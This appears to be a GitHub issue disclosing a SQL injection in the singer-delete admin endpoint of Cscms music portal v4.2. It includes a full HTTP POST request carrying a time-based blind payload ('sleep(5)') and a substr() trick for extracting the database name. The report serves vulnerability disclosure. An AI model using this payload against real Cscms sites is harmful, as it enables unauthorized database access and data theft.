SQL injection vulnerability exists in Cscms music portal system v4.2

#### Details

there is a Injection vulnerability exists in singer_Singer.php_del

After logging in, the administrator needs to add a singer first and then delete the singer. When deleting the singer, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows

```
POST /admin.php/singer/admin/singer/del?yid=3 HTTP/1.1
Host: cscms.test
Content-Length: 4
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/singer/admin/singer?yid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=v1ahrkd5h84dsm4ftla4ruuks41kb526
Connection: close

id=1)and(sleep(5))--+
```
![image](https://user-images.githubusercontent.com/96719328/164127082-5dd7dc26-fda6-496d-877d-69e6037d1592.png)

You can see that success makes the server sleep
Construct payload database

![image](https://user-images.githubusercontent.com/96719328/164127091-e7ac1c4e-9adc-4944-9ed8-9532500cc5d0.png)

![image](https://user-images.githubusercontent.com/96719328/164127105-cd8ef54c-f1c1-4075-9068-d98e5bb7e96a.png)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SQL injection vulnerability exists in Cscms music portal system v4.2 #28

Details

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development